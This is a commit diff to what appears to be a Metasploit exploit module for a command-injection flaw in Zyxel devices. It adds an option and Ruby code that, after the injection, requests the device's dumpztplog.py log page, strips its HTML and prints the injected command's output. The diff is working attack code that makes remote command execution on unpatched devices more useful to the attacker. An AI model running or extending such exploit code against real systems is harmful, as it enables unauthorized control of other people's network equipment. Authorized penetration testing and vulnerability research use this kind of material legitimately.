Added code to print stdout of payloads without reverse connections

Author: jheysel-r7

modules/exploits/linux/http/zyxel_parse_config_rce.rb

@@ -52,6 +52,7 @@ def initialize(info = {})
     register_options(
       [
         OptString.new('WRITABLE_DIR', [ true, 'A directory where we can write files', '/tmp' ]),
+        OptBool.new('SHOW_CMD_OUTPUT', [true, 'When true the module will query the logs for the injected command\'s stdout', false])
       ]
     )
   end
@@ -155,6 +156,25 @@ def exploit
       'data' => data.to_s
     })
 
+    # If the payload being used is for example cmd/unix/generic and not a payload spawning a reverse connection we can
+    # query the /ztp/cgi-bin/dumpztplog.py for the stdout of the command and print it for the user.
+    if payload_instance.connection_type == 'none'
+      cmd_output_res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, 'ztp', 'cgi-bin', 'dumpztplog.py')
+      })
+
+      if cmd_output_res&.body && !cmd_output_res.body.empty?
+        output = cmd_output_res.body.split("</head>\n<body>")[1]
+        output = output.split("</body>\n</html>")[0]
+        output = output.gsub("\n\n<br>", '')
+        output = output.gsub("[IPC]IPC result: 1\n", '')
+        print_good("Command output: #{output}")
+      else
+        print_error("Could not retrieve the command's stout from /ztp/cgi-bin/dumpztplog.py")
+      end
+    end
+
     unless cmd_injection_res && !cmd_injection_res.body.include?('ParseError: 0xC0DE0005')
       fail_with(Failure::PayloadFailed, 'The response from the target indicates the payload transfer was unsuccessful')
     end